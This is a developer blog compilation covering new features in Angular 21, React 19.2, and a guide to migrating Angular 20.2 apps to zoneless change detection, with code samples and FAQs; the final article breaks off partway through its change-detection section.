What’s New in Angular 21?

Angular 21 introduces a new era of efficiency and developer-friendly design. With experimental Signal Forms and default zoneless change detection, this release focuses on performance and reactivity. Let’s explore how these updates shape the framework’s future and simplify everyday development.

If you’ve been following Angular’s journey, version 21 brings a breath of fresh air with features that many developers have been waiting for. The long-awaited Signal Forms are finally arriving. Although experimental, they give a glimpse into a smoother, more reactive approach to handling forms in Angular. Meanwhile, zoneless change detection is now enabled by default, boosting the framework’s performance and making your life easier. Let’s go over some of the cool updates coming in Angular 21.

Signal Forms

Angular 21 introduces Signal Forms, an experimental but promising feature that offers a fresh, declarative, and reactive way to manage form state using signals. To better understand how Signal Forms work in practice, let’s walk through the basic steps of creating one, starting with defining your form’s state as a signal.

// signal comes from @angular/core; form and the other Signal Forms helpers
// live in the experimental Signal Forms entry point (check the docs for the exact path)
crewMember = signal<CrewMember>({
  name: '',
  imageUrl: '',
  position: ''
});

crewForm = form(this.crewMember);

This setup defines a signal holding the crew member’s model. You can then pass this model to Angular’s form() function to create the reactive form tree reflecting this structure.

The next step is to bind individual signal form fields to your HTML elements using the Field directive. This directive creates a two-way binding between the input element and the form’s signal model. Any changes in the input automatically update the form state, and any updates to the model immediately reflect in the input. Using it is really straightforward: just add [field] to your input elements and assign the corresponding form field. Remember to import the Field directive in your component’s imports array; otherwise, Angular won’t recognize it.
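A minimal component setup might look like the sketch below (the selector and file names are illustrative; Field ships with the experimental Signal Forms entry point, so check the docs for the exact import path):

@Component({
  selector: 'app-crew-form',                 // illustrative selector
  imports: [Field],                          // required so Angular recognizes [field]
  templateUrl: './crew-form.component.html', // illustrative template path
})
export class CrewFormComponent {
  crewMember = signal<CrewMember>({ name: '', imageUrl: '', position: '' });
  crewForm = form(this.crewMember);
}

With that in place, the bindings in the template look like this: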

<input type="text" [field]="crewForm.name" placeholder="Enter pirate name">
<input type="url" [field]="crewForm.imageUrl" placeholder="Enter image URL">
<input type="text" [field]="crewForm.position" placeholder="Enter crew position">
…
<!--Preview-->
<div>
   <p>Name: {{ crewForm.name().value() }}</p>
   <p>Position: {{ crewForm.position().value() }}</p>
</div>
<img [src]="crewMember().imageUrl">

In this example, you can see inputs bound to the crewForm fields for name, image URL, and position. Just below, there’s a live preview that shows how you can display the current form values by accessing crewForm.name().value() or crewForm.position().value(). Similarly, the image URL is read from the original crewMember signal, demonstrating how both the crewForm and the crewMember signal stay in sync.

Figure 1: Signal Form live preview

Validation

To add validation in Signal Forms, pass a schema function into the form() method. The function can include built-in validators, such as required, email, or minLength, alongside your own custom validation logic. Error messages can be customized via options, allowing friendly and precise feedback for users interacting with forms.

crewForm = form(this.crewMember, (path) => {
    required(path.name, { message: 'Name is required' });
    minLength(path.name, 2, { message: 'Name must be at least 2 characters long' });
    required(path.position, { message: 'Position is required' });
    required(path.imageUrl, { message: 'Image URL is required' });
  });

To show validation errors for a form field, first check if the field has been touched (if the user has interacted with it) and is currently invalid. This prevents displaying errors like ‘required’ prematurely before the user starts typing.

You can get the list of errors for the field by accessing its errors() signal, and then display the error message.

@if(crewForm.name().touched() && crewForm.name().invalid()) {
     <ul class="error-message">
       @for(error of crewForm.name().errors(); track $index) {
            <li>{{ error.message }}</li>
       }
     </ul>
 }

Figure 2: Signal Form validation errors

These examples illustrate the basic usage of Signal Forms to demonstrate core concepts. Check the Angular official docs to learn more about Signal Forms and their evolving functionality. Since this is an experimental API, expect some changes, but also a bright future for building forms declaratively and reactively.

Zoneless by default

Starting with Angular 21, zoneless change detection is now enabled by default. No more Zone.js dependency. The Zoneless API has been stable since Angular 20.2, but version 21 takes it further: there’s no need to import provideZonelessChangeDetection in your app config, as all new Angular applications are now zoneless out of the box.

In a zoneless app, change detection no longer triggers automatically on every async task, like HTTP requests, observables, or timers such as setTimeout or setInterval. This is a big shift compared to how Zone.js worked. Now, change detection runs only when explicitly triggered by certain actions, including:

  • The async pipe
  • User-bound events like clicks or input events
  • An update to a signal that is read in the template
  • A manual call to markForCheck()
  • A call to ComponentRef.setInput()

Going zoneless breaks free from the old Zone.js magic, so change detection fires only on explicit triggers you control, avoiding unnecessary change detection cycles and resulting in better app performance. Removing Zone.js also shrinks the bundle size, which improves Core Web Vitals. Debugging gets cleaner as well, since stack traces are no longer polluted by Zone.js. For best performance, pairing zoneless mode with the OnPush strategy is highly recommended.

Another important advantage is improved compatibility with the wider ecosystem. Since Zone.js patches browser APIs, it sometimes struggles to keep up with new APIs or modern JavaScript features like async/await, which require special handling. Eliminating Zone.js removes this layer of complexity, leading to better long-term maintainability and fewer compatibility headaches.

For in-depth details, migration advice, and performance insights, check out my full guide.

Vitest – New Default Testing Framework

Angular 21 introduces Vitest as the new standard testing framework, replacing Jasmine and Karma for newly created projects. This shift comes after years of uncertainty following Karma’s deprecation in 2023, providing Angular developers with a clear, modern, and efficient testing solution.

Key Benefits:

  • Fast test runs powered by the Vite build tool
  • Native support for TypeScript and ESM
  • Real browser environment testing
  • Modern and rich API

Angular’s move to Vitest means better alignment with the modern JS ecosystem, and future migration utilities will ease switching from Jasmine. Developers will run tests the same way with ng test. Importantly, Jasmine and Karma can still be chosen instead of Vitest if needed.
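For orientation, a minimal spec might look like the sketch below (assuming explicit Vitest imports rather than globals, with AppComponent standing in for any standalone component):

import { TestBed } from '@angular/core/testing';
import { beforeEach, describe, expect, it } from 'vitest';
import { AppComponent } from './app.component';

describe('AppComponent', () => {
  beforeEach(async () => {
    // Configure the testing module with the standalone component under test
    await TestBed.configureTestingModule({ imports: [AppComponent] }).compileComponents();
  });

  it('creates the component', () => {
    const fixture = TestBed.createComponent(AppComponent);
    expect(fixture.componentInstance).toBeTruthy();
  });
});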

Figure 3: The Vitest test result in console

Angular ARIA

Angular ARIA is a library created in response to developer requests for accessible components that are simpler to style. It provides a collection of headless Angular directives implementing common accessibility patterns without any predefined styles, allowing developers full control over styling.

Currently, the Angular ARIA library includes accessible directives for the following UI components:

  • Accordion
  • Combobox
  • Listbox
  • Radio Group
  • Tabs
  • Toolbar

For example, the Listbox pattern is applied by attaching the directives to plain elements:

<div ngListbox>
  @for (item of crew.value(); track item.id) {
    <div [value]="item.name" ngOption>{{ item.name }}</div>
  }
</div>

Figure 4: ARIA roles and attributes automatically added by using Angular ARIA directives

Other Improvements

Angular 21 goes beyond major new features by delivering various improvements, migrations, and quality enhancements that together modernize and optimize Angular apps.

  • The HttpClient is built in by default, so new projects no longer require manual setup of provideHttpClient().
  • Migration Scripts:
    • Migration from NgClass to class bindings:
      ng generate @angular/core:ngclass-to-class
    • Migration from NgStyle to style bindings:
      ng generate @angular/core:ngstyle-to-style
    • Migration of RouterTestingModule usages inside tests to RouterModule:
      ng generate @angular/core:router-testing-module-migration
    • Replacement of CommonModule imports with standalone imports:
      ng generate @angular/core:common-to-standalone
  • CLI support for Tailwind CSS config generation, making it easier to set up Tailwind CSS in Angular projects right from project creation.

Figure 5: CLI support for Tailwind CSS config generation

In addition to these changes, Angular 21 includes numerous bug fixes, performance improvements, and developer experience enhancements that make the framework more stable, efficient, and user-friendly.

Conclusion

Angular 21 delivers a thoughtful balance of innovation and refinement, introducing tools that make modern app development more efficient and enjoyable. Signal Forms, Vitest, default zoneless mode, and Angular ARIA directives all emphasize what this update is about: speed, clarity, and accessibility.

Angular continues to prove that a mature framework can still innovate, adapt, and surprise.

References

  1. Angular documentation
  2. ng-conf 2025 LIVE Angular Team Keynote
  3. Vitest documentation

 

🔍 Frequently Asked Questions (FAQ)

1. What are Signal Forms in Angular 21?

Signal Forms in Angular 21 introduce a new, reactive way to manage form state using signals. This experimental feature allows developers to declaratively define forms that remain synchronized with their underlying signal-based model, enabling more efficient and readable form handling.

2. How do you bind fields in a Signal Form?

Angular 21 uses the Field directive for two-way binding between form inputs and signal-based models. Developers add [field] to input elements and map them to specific fields in the Signal Form, ensuring real-time updates between the view and data model.

3. How is validation implemented in Signal Forms?

Validation in Signal Forms is added via a schema function passed to the form() method. This function can include Angular’s built-in validators and custom messages, allowing for tailored and user-friendly error feedback displayed only after user interaction.

4. What is zoneless change detection in Angular 21?

Zoneless change detection is now enabled by default in Angular 21, removing the dependency on Zone.js. Change detection no longer triggers on all async operations but instead activates explicitly, resulting in improved performance, cleaner stack traces, and smaller bundle sizes.

5. How does zoneless mode improve app performance?

By removing Zone.js, Angular avoids unnecessary change detection cycles and reduces overhead. Performance improves as detection is limited to explicit triggers such as markForCheck(), async pipes, or template-bound signal updates.

6. Why did Angular 21 switch to Vitest for testing?

Angular 21 adopts Vitest as the default testing framework for new projects. Vitest offers fast execution via Vite, native TypeScript and ESM support, and a modern API aligned with current JavaScript testing trends.

7. What is Angular ARIA and what components does it support?

Angular ARIA is a new library offering headless directives for accessible components without enforced styling. It currently supports Accordion, Combobox, Listbox, Radio Group, Tabs, and Toolbar, enhancing accessibility while preserving design flexibility.

8. What CLI migration tools are available in Angular 21?

Angular 21 includes CLI commands for migrating NgClass, NgStyle, and RouterTestingModule usage, and for replacing CommonModule with standalone imports. It also adds CLI support for generating Tailwind CSS configuration during project setup.

9. What are the benefits of removing Zone.js from Angular apps?

Removing Zone.js simplifies debugging, reduces bundle size, enhances compatibility with modern browser APIs, and improves Core Web Vitals. It also future-proofs Angular applications against changes in JavaScript runtime behavior.

10. What should developers consider when adopting Signal Forms?

As an experimental API, Signal Forms may evolve in syntax or behavior. Developers should refer to the latest Angular documentation and be cautious when using it in production, while leveraging its benefits for cleaner, reactive form logic.

React 19.2 Explained: Updates, Impact, and What to Watch For

React 19.2 brings targeted improvements to performance, rendering, and overall developer experience. Key highlights include updates to the core library and optimizations in React DOM for faster, more efficient UI rendering. Let’s take a closer look at what’s new.

What a month for the React ecosystem! On October 7th at the React Conference in Henderson, Nevada, the React Foundation was announced, marking a new era of technical governance for the library and its related projects, including JSX. The founding members include Amazon, Callstack, Expo, Meta, and Vercel, with Expo and Callstack representing major players in the React Native space.

Just a few days before that, the React Team released version 19.2. This release brings new features for component rendering and better performance tools.

These days, most developers start React projects using frameworks like Next.js. On the 9th of October, the team announced the beta for Next.js version 16, which will bake in support for React 19.2. With major support coming soon, let’s look at what’s new in React 19.2 and how you can use these updates in everything from side projects to production-grade applications.

Preface

The changes to React 19.2 can be broken down into three core categories:

  • Updates to the React core library
  • Changes to React DOM, the package that enables React to update and render UI components to the web browser by interacting with the browser’s Document Object Model
  • Improvements to features shipped in previous releases, such as batched Suspense updates

I’m keeping these categories separate because React isn’t limited to the web. For example, Meta once maintained react-360 for VR content, though it was deprecated in 2020. Today, React can render to formats such as PDF and the Command Line Interface (CLI), among others. There’s a whole host of options that can be found in the chentsulin/awesome-react-renderer GitHub repository. As a result, updates to the core library provide benefits that extend beyond web applications.

What’s new in the Core Library?

The <Activity /> Component

In declarative, state-driven architectures like React, the UI reflects the current state at any given time. To help illustrate this, imagine a dashboard application with a collapsible sidebar menu. Users often interact with such a UI by toggling the visibility of the sidebar based on their needs. Conditional rendering lets you express how different states map to different UI structures.

For example:

const HomePage = () => {
 const [isVisible, setIsVisible] = useState(false)

 return (
   <>
     {isVisible && <Sidebar/>}
     {/* Wrap the state update in a callback so it runs on click, not during render */}
     <button onClick={() => setIsVisible((state) => !state)}>Toggle Show Sidebar</button>
   </>
 )
}

When isVisible transitions from true to false, the component unmounts, and all Effects are destroyed, which cleans up any active subscriptions. No subsequent rendering or state changes can occur.

But by taking this approach, you’re missing out on a couple of features. For instance, if you wanted to temporarily hide a sidebar, but maintain its state (like the open tabs, the scroll position, the form inputs), you only have two options:

  1. Unmount the component → state lost, effects destroyed.
  2. Hide the component with CSS → state preserved, but effects (like subscriptions, event listeners, polling) continue running in the background, wasting resources.

Because React is just JavaScript, there was no built-in way to visually hide something and safely suspend its effects.

Until now. The new <Activity /> component lets you hide and later restore a component, preserving the internal state of its child components.

const HomePage = () => {
 const [isVisible, setIsVisible] = useState(false);

 return (
   <>
     <Activity mode={isVisible ? "visible" : "hidden"}>
       <Sidebar />
     </Activity>
     <button onClick={() => setIsVisible((state) => !state)}>
       Toggle Show Sidebar
     </button>
   </>
 );
};

When the mode prop is set to hidden, the child components are hidden using the display: "none" CSS property, which removes the elements from the layout and frees the space they occupied. This is different from the visibility: hidden CSS property, which hides elements but retains their space in the layout.

While hidden, child components continue to re-render in response to new props, but at a lower priority compared to visible content.

When the boundary becomes visible again, React reveals the child components with their previous state restored and re-creates their Effects. In other words, until we make the component visible again, no unwanted side effects run.

In practice, when the <Sidebar /> component is in mode="visible", any navigation items that are expanded or collapsed will preserve their state. If the sidebar becomes hidden and then visible again, those items will remain in the same open or closed state they were in before.

Another way to see this is that the <Activity /> component manages background UI processes. Instead of discarding interface elements that are temporarily out of view, React shifts them into a controlled, low-priority state. The idea is closer to an operating system moving a task to the background queue; its memory and context remain intact, and it can still perform lightweight updates when needed, but it yields most of the CPU to the active, foreground tasks.

Preparing content by pre-rendering with <Activity />

Sometimes you don’t just want to hide content; you want to prepare it. The <Activity /> component can pre-render components that will soon become visible.

This has great implications for dependency lazy loading or data pre-fetching, leading to reduced loading times.

For example, let’s assume we have a sidebar with items defined and loaded from a CMS. If we wanted to prefetch data before it becomes visible, we could render it inside an <Activity mode="hidden"> boundary.

This allows React to start fetching data in the background using the use() hook. So by the time users open the sidebar, the data is already available and rendered, and it feels instant.

import { use } from 'react'

// Start the request at module scope so the same promise is shared across renders
const sidebarDataPromise = fetchSidebarData()

function Sidebar() {
 // use() suspends until the promise resolves, so a hidden pre-render can start the fetch early
 const data = use(sidebarDataPromise)
 return (
   <nav>
     {data.items.map((item) => (
       <a key={item.id} href={item.href}>
         {item.label}
       </a>
     ))}
   </nav>
 )
}

TanStack Query gotchas

The caveat to effects not running in "hidden" mode is that any data fetching that relies on running inside an effect can't take advantage of the pre-rendering capabilities of the <Activity /> component. This includes, but is not limited to, the useQuery hook from TanStack Query, which uses a useEffect under the hood. To use this pattern with TanStack Query, which also caches the fetched data in memory to guard against refetching non-stale data, you can reach for queryClient.ensureQueryData, as in the example below.

import { use } from 'react';
import { useQueryClient } from '@tanstack/react-query';

const SIDEBAR_QUERY_KEY = 'sidebar';

function Sidebar() {
 const queryClient = useQueryClient()

 // ensureQueryData returns cached data if still fresh, otherwise fetches and caches it
 const data = use(queryClient.ensureQueryData({
   queryKey: [SIDEBAR_QUERY_KEY],
   queryFn: fetchSidebarData,
 }))

 return (
   <nav>
     {data.items.map((item) => (
       <a key={item.id} href={item.href}>
         {item.label}
       </a>
     ))}
   </nav>
 )
}

An added benefit of pre-fetching with TanStack query here is that any other components subscribing to the same query key will benefit from the data having a warm cache ready to go.
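For instance, a sibling component mounting later with the same key reads straight from that warm cache. A sketch, reusing fetchSidebarData and the key constant from above and assuming useQuery is imported from @tanstack/react-query:

function SidebarBadge() {
  // Subscribes to the same cache entry; no refetch happens while the data is still fresh
  const { data } = useQuery({
    queryKey: [SIDEBAR_QUERY_KEY],
    queryFn: fetchSidebarData,
  });

  return <span>{data ? data.items.length : 0}</span>;
}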

The useEffectEvent Hook

If you’ve ever written a useEffect that connects to an external system, say a WebSocket, a stream, or a DOM event, you’ve probably had to battle the dependency array. The typical problem is that you want to react to something external, but the effect keeps re-running every time one of your props or state values changes. You either end up reconnecting too often or disabling the lint rule, which may leave you in the dark as the dependencies continue to grow and evolve.

Take this great example from the React Docs: you’re building a chat app, and when a user joins a new room, you want to show a notification once the connection is ready:

function ChatRoom({ roomId, theme }) {
 useEffect(() => {
   const connection = createConnection(serverUrl, roomId);
   connection.on('connected', () => {
     showNotification('Connected!', theme);
   });
   connection.connect();
   return () => connection.disconnect();
 }, [roomId, theme]);
}

This looks fine, but there’s a subtle issue. If the user switches between light and dark themes while the chat is connected, the entire effect re-runs, disconnecting and reconnecting the socket, just to show the notification with the right color. It’s probably not what you were going for. The connection should only reset when roomId changes, not because of theming. What most would do in this case is remove the theme from the dependency array. However, that results in a linter warning, and you ultimately will have to disable it with a comment.

This is where useEffectEvent shines. It lets you separate the “event reaction” logic from the “effect setup” logic, so React can handle updates to values like theme without forcing a teardown and reconnect.

Here’s the same example rewritten:

function ChatRoom({ roomId, theme }) {
 const onConnected = useEffectEvent(() => {
   showNotification('Connected!', theme);
 });

 useEffect(() => {
   const connection = createConnection(serverUrl, roomId);
   connection.on('connected', () => onConnected());
   connection.connect();
   return () => connection.disconnect();
 }, [roomId]); // ✅ Effect runs only when roomId changes
}

The key difference is that the onConnected callback always “sees” the latest theme, but the effect itself remains stable because the event handler’s identity never changes. React treats useEffectEvent callbacks as stable by design, meaning they don’t need to appear in dependency arrays.

This pattern is incredibly useful in real apps. Think about analytics events, WebSocket subscriptions, or integrations with browser APIs. You often need to respond to events (connection open, visibility change, playback start, etc.) without tearing down your entire effect tree every time an unrelated prop changes.

So if you’ve been in the habit of sprinkling eslint-disable-next-line react-hooks/exhaustive-deps above every useEffect that listens to external events, this new addition to React’s collection of hooks finally makes that unnecessary. Just make sure to upgrade your eslint-plugin-react-hooks to the latest version.
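Assuming npm, that upgrade is a one-liner:

npm install --save-dev eslint-plugin-react-hooks@latest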

Improving cache management with cacheSignal in React Server Components

The cache() function, used exclusively with React Server Components (RSCs), allows you to memoize the results of data fetching or expensive computations across requests. Starting with React 19.2, the core library introduces a new companion API, cacheSignal(), to complement the existing cache() API and provide greater control over cache lifecycles.

In short, cacheSignal() gives you an AbortSignal that matches the cache’s lifetime. When the cache expires, the signal is aborted, so any ongoing operations like fetch() calls can be cancelled smoothly.

This idea isn’t new – using abort signals is a common practice on the client side, where fetch requests made inside effects are aborted during cleanup so that no resources are wasted after a component unmounts. Now it’s built into React’s cache and rendering system.
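For comparison, that familiar client-side pattern looks roughly like this (url and setData are placeholders for your own request target and state setter):

useEffect(() => {
  const controller = new AbortController();
  fetch(url, { signal: controller.signal })
    .then((res) => res.json())
    .then(setData)
    .catch((err) => {
      // Aborting rejects with an AbortError; anything else is a real failure
      if (err.name !== 'AbortError') throw err;
    });
  // Cleanup aborts the in-flight request when the component unmounts or url changes
  return () => controller.abort();
}, [url]);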

Here’s an example with cacheSignal():

// cache and cacheSignal are imported from 'react' in the Server Components environment
import { cache, cacheSignal } from 'react';

const getUser = cache(async (id: string) => {
 // This signal aborts once the render completes, aborts, or fails
 const signal = cacheSignal();

 const response = await fetch(`/users/${id}`, { signal });

 if (!response.ok) {
   throw new Error(`Failed to fetch user: ${response.status}`);
 }

 return response.json();
});

export async function UserProfile({ id }: { id: string }) {
 const user = await getUser(id);

 return (
   <section>
     <h2>{user.name}</h2>
     <p>{user.email}</p>
   </section>
 );
}

In this example:

  • getUser is wrapped in cache(), which deduplicates calls with the same arguments within React’s server cache scope.
  • Inside getUser, cacheSignal() returns an AbortSignal that React will abort after rendering is conclusive. This occurs in one of three scenarios:
    • React has successfully completed rendering.
    • The render was aborted.
    • The render has failed.
  • Passing that signal to fetch() ensures that any pending network requests are immediately canceled if the render is aborted, fails, or completes.

While cacheSignal() currently only operates within the RSC environment and returns null on the client, the React team has indicated in the official docs that it plans to extend its availability to Client Components in future releases.

Performance profiling gets new powers

Chrome provides the ability to add custom data to its Performance panel via an extensibility API, and React 19.2 finally takes advantage of it. Previously, the performance panel showed flame charts for JavaScript, layout, and paint events, but not what React was doing internally. You could see when the browser was busy, but not why.

The React DevTools Profiler, added in version 16.5, helped fill some gaps, but only from React’s point of view. It showed which components rendered, how long each render took, and what triggered them. This was useful for seeing what React did, but we were still missing info on when or how it worked with the browser. The Profiler was separate from the browser’s performance timeline, so you couldn’t match React’s scheduling with main-thread tasks or paint events.

This separation made it hard to understand concurrency and scheduling. For example, if interactions were slow, you couldn’t tell if React was blocked by the browser, yielding work, or just handling a low-priority update.

Figure 1: React Performance Tracks (Source)

React 19.2 changes this by adding React Performance Tracks to Chrome DevTools’ Performance panel. This bridges the gap between React’s scheduler and the browser’s timeline. Now, you can see React’s priorities, renders, and effects right next to standard performance data, giving you a clear view of how React works frame by frame.

The tracks are broken down into the Scheduler track and the Component track:

  • Scheduler: visualizes React’s internal priorities like blocking and transition updates, showing when work starts, pauses, and completes.
  • Components: shows which components are rendering or running effects.

What’s new with React DOM?

Partial Pre-rendering

Partial pre-rendering first came as an experimental feature in Next.js 14. And now, with React 19.2, it’s shipping as part of the react-dom package, bringing a new rendering model to React that allows you to combine the benefits of static and dynamic rendering.

This provides a new level of flexibility, combining the performance benefits of Static Site Generation (SSG), where an entire route is rendered to static HTML, with the freshness of Server-Side Rendering (SSR), which re-renders the page on each request.

In a nutshell, with Partial Pre-rendering:

  • React pre-renders as much of the page as possible ahead of time (the static shell).
  • The parts that depend on live data or user-specific information are left as “holes” (Suspense boundaries).
  • When a request arrives, React resumes rendering the postponed (dynamic) parts on the server from the saved state, then streams the completed output to the browser.

This can be great for use cases such as E-commerce product pages, where product details like the title, description, and images rarely change, whereas pricing, localization, and stock generally do. With partial pre-rendering, you can serve a cached static shell instantly from a CDN to ensure the initial UI renders quickly and is close to the end user. Then, you can resume rendering only the dynamic components, such as price and stock, when the request hits the server.
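To make that concrete, here is a rough sketch of how such a product page could be structured (the component names are illustrative, and the prerender/resume plumbing itself is handled by your framework or server setup):

import { Suspense } from 'react';

function ProductPage({ id }: { id: string }) {
  return (
    <main>
      {/* Static shell: safe to prerender ahead of time and cache on a CDN */}
      <ProductDetails id={id} />

      {/* Dynamic holes: postponed at build time, resumed on the server per request */}
      <Suspense fallback={<PriceSkeleton />}>
        <LivePrice id={id} />
      </Suspense>
      <Suspense fallback={<StockSkeleton />}>
        <StockStatus id={id} />
      </Suspense>
    </main>
  );
}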

Wrapping up

Beyond the core library and DOM package updates, the React team sprinkled in a few updates around batching suspense boundaries, web stream support for Node, eslint-plugin-react-hooks, and more!

As of October 20, 2025, 66.8% of websites using React are still on the 2017 release, version 16, and 10.9% on version 18, according to W3Techs. There’s still some time before these features will hit scale on the majority of production-grade applications. But that doesn’t mean it’s not important to get familiarized with what’s possible and to learn the concepts early. Isn’t that the perfect excuse to play around with them in a side project?

 

🔍 Frequently Asked Questions (FAQ)

1. What is new in React 19.2?

React 19.2 introduces key improvements to component rendering, performance profiling, and developer experience. Major updates include the <Activity /> component, useEffectEvent hook, cacheSignal() for RSCs, and partial pre-rendering support in React DOM.

2. How does the <Activity /> component work in React 19.2?

The new <Activity /> component enables developers to hide and later restore UI components while preserving their internal state and effects. It uses display: "none" for layout exclusion and allows low-priority updates in the background, optimizing performance without resource waste.

3. What are the benefits of pre-rendering with <Activity />?

<Activity mode="hidden"> allows React to prepare hidden components in advance, improving user experience through faster display of content. This is particularly useful for lazy-loading data or UI components, leveraging features like use() or queryClient.ensureQueryData with TanStack Query.

4. What problem does useEffectEvent solve in React?

useEffectEvent decouples event logic from effect setup, preventing unnecessary re-renders caused by changing props or state. It offers a stable reference for event callbacks, improving code stability and reducing the need to disable lint rules.

5. How does cacheSignal() improve cache control in React Server Components?

cacheSignal() returns an AbortSignal tied to the lifecycle of React’s server-side cache. When rendering concludes or fails, any fetch requests using this signal are aborted, avoiding unnecessary network usage and improving memory efficiency.

6. What is partial pre-rendering in React 19.2?

Partial pre-rendering allows React to pre-render static parts of a page and defer dynamic rendering using Suspense boundaries. This enables hybrid rendering models that combine the speed of static pages with the freshness of dynamic content.

7. How does React 19.2 improve performance profiling in Chrome DevTools?

React 19.2 introduces React Performance Tracks in Chrome DevTools’ Performance panel. These tracks provide visibility into React’s scheduler and component behavior, enabling better debugging of concurrency and rendering timing.

8. What is the relationship between React 19.2 and Next.js 16?

Next.js 16, announced in beta shortly after React 19.2, bakes in support for the latest React version. This close alignment ensures seamless integration for developers using modern React features in production-ready applications.

9. What limitations exist with TanStack Query and <Activity />?

Because TanStack Query’s useQuery relies on useEffect, it cannot run during hidden-mode pre-renders. Developers must use methods like queryClient.ensureQueryData for preloading and caching data outside the effect lifecycle.

10. Why is the React Foundation significant?

Launched alongside React 19.2, the React Foundation formalizes community governance and includes major stakeholders like Meta, Amazon, Vercel, and Expo. It strengthens React’s roadmap transparency and long-term ecosystem alignment.

No More Zone.js: A Better Way to Build Angular Apps with Angular 20.2

Zone.js has been at the heart of Angular’s change detection since the beginning, but the framework is moving forward. With the introduction of zoneless mode and signals, Angular now supports a reactivity model that is simpler, faster, and more explicit. This article shows what changes when you drop Zone.js, how to refactor your app, and how to work effectively with the new change detection model. You’ll see what breaks, what improves, and how to rethink your app’s reactivity when Zone.js is no longer in control.

For years, Zone.js powered Angular’s “magic refresh,” keeping apps in sync without extra effort. It worked by patching async browser APIs and notifying Angular whenever something might have changed. While this made development smoother, it also came with trade-offs: unnecessary change detection cycles and debugging complexity. Now, Angular 20.2 marks a turning point. Zoneless mode is stable, opening the door to a leaner and more predictable way of building Angular apps.

What is Zone.js and How Does it Work?

Before we talk about going zoneless, let’s recall what Zone.js actually is and does. It’s a library that monkey-patches asynchronous browser APIs such as setTimeout, promises, DOM events, and HTTP requests. Each time one of these is completed, it notifies Angular that “something might have changed.” But Zone.js couldn’t provide details about what changed or where. As a result, Angular had to trigger change detection across the whole component tree to make sure the UI stayed in sync.

That trade-off defined much of the Angular developer experience. On the bright side, Zone.js made things feel almost magical, the UI updated automatically whenever async code finished, and you didn’t have to think about it. This simplicity was especially appealing in Angular’s early days, when developers could focus on building features instead of worrying about change detection triggers.

But the magic came with a price. Zone.js treated every async event as a possible change, which meant Angular often did more work than necessary. Over time, that extra overhead slowed apps down and made debugging harder.

For years, developers enjoyed the “magic” of Zone.js but also dealt with its drawbacks. Here is some good news: Angular has been evolving to eliminate this dependency, and with Angular 18, we see the first experimental steps toward a zoneless future.


Angular Zoneless – From Experimental to Stable

The idea of running Angular without Zone.js has been a long-awaited change in the framework’s evolution. Back in Angular 18, the team introduced the first experimental APIs for zoneless mode, which allowed us to explore a world where change detection was no longer tied to Zone.js patching every asynchronous operation in the browser.

With the release of Angular 20.2, these APIs became stable, and we can now confidently build production applications in zoneless mode. Instead of relying on Zone.js, we work with an explicit change detection model where updates are triggered by signals, template events, async pipes, and manual checks when necessary.

This naturally raises the next question: why should we go zoneless, and what do we actually gain by removing Zone.js from our applications?

Why go zoneless?

So why should we drop Zone.js now that we finally can? The main reasons come down to leaner applications, improved performance, and more predictable behavior.

Benefits of going zoneless

  • Reduced bundle size and faster initial load: Without Zone.js, the bundle shrinks by about 33 KB. That’s not huge on its own, but it translates directly into a faster initial load, since the browser no longer has to download and parse the library.

Figure 1: Initial bundle size with Zone.js

Figure 2: Initial bundle size in zoneless app

  • Better performance: Zone.js often triggered unnecessary change detection cycles, even when no data had changed. Zoneless mode removes that overhead. Change detection now runs only when it actually needs to, giving us more predictable and performant rendering.
  • Easier debugging: With Zone.js gone, stack traces are no longer wrapped in Zone-specific frames. You get a full, accurate stack trace that points exactly to where something happened. No more extra noise. This makes debugging and profiling significantly easier.
  • Full control over reactivity: In zoneless Angular, the developer explicitly decides when the UI should update. This is a major shift – instead of relying on Zone.js “magic,” you know exactly what triggers change detection and when it happens. That makes the app’s reactivity model both transparent and intentional.

Trade-offs to keep in mind

  • You may need to adjust your mental model. Without automatic change detection, you must adopt a more deliberate strategy for updating the UI. That means paying more attention to using signals, async pipes, or calling markForCheck when necessary.
  • Migration effort: migrating a large app can take time, especially if it’s heavily tied to Zone.js behaviors and doesn’t use signals or the OnPush change detection strategy.

Create a zoneless project

Starting a zoneless project is surprisingly simple. In Angular v20.2, you can enable zoneless mode directly when creating a new project with the CLI:

Figure 3: Create zoneless project with zoneless flag
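For example (my-zoneless-app is a placeholder project name):

ng new my-zoneless-app --zoneless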

If you skip the flag, the Angular CLI will ask you a question during project setup:

Figure 4: Create zoneless app – CLI zoneless question

Select “Yes” and you will get a fully Zone.js-free project!

Migration to zoneless

If you already have an Angular project and want to migrate to zoneless, the process takes a few steps:

  • In app.config.ts, swap: provideZoneChangeDetection({ eventCoalescing: true }) → provideZonelessChangeDetection()

Figure 5: Switch to zoneless provider in app.config.ts

  • Remove zone.js from angular.json build and test configs.

Figure 6: Remove zone.js from build config in angular.json

Figure 7: Remove zone.js and zone.js/testing from test config in angular.json

  • Delete the imports: import 'zone.js' and import 'zone.js/testing'.
  • Uninstall Zone.js once nothing depends on it anymore.

Figure 8: Uninstall Zone.js

  • Verify in the browser. Open your app in the browser, open the console, and type Zone. You should get an error: Zone is not defined. That confirms Zone.js has been fully removed.

Figure 9: Checking in the browser console if Zone.js is still available in the app

How Change Detection Works Without Zone.js

Once Zone.js is gone, Angular no longer “guesses” when to refresh the UI. Instead, the framework listens to specific, intentional triggers that tell it exactly when change detection should run. So what are the actual triggers that make Angular run change detection without Zone.js?

Change detection triggers

  • Bound host or template event listeners:

<button class="refill-button" (click)="refillRum()">Refill Barrel</button>

@HostListener('click')
refillRum(): void {
  this.rumService.refillRum();
}
  • Async pipe calls ChangeDetectorRef.markForCheck() under the hood whenever the observed value changes, ensuring your template reflects the new data.
@for(location of treasureLocations$ | async; track location.id) {
  <!-- Treasure location content -->
}
  • Updating a signal used in a template (see the sketch after this list)
  • ComponentRef.setInput(): When you programmatically set an input on a dynamically created component, Angular marks that view as dirty and schedules change detection.
  • Manual call of ChangeDetectorRef.markForCheck(): While Angular handles change detection automatically in most cases, you can still force it with markForCheck(), ensuring Angular picks up changes it wouldn’t catch otherwise.
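As promised, here is a minimal sketch of the signal trigger (the counter is illustrative):

count = signal(0);

increment(): void {
  // Setting a signal that the template reads, e.g. {{ count() }}, schedules change detection
  this.count.update((value) => value + 1);
}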

It’s important to understand that going zoneless doesn’t rewrite Angular’s change detection model from scratch. The two familiar strategies, Default and OnPush, are still in place, and their behavior hasn’t changed. What changed is when the change detection process starts.

  • Default strategy: With the default mode, Angular still walks the component tree from top to bottom, checking each view to see if updates are needed. Zoneless or not, this part works exactly the same.

Figure 10: Default change detection – Trigger change detection by click event

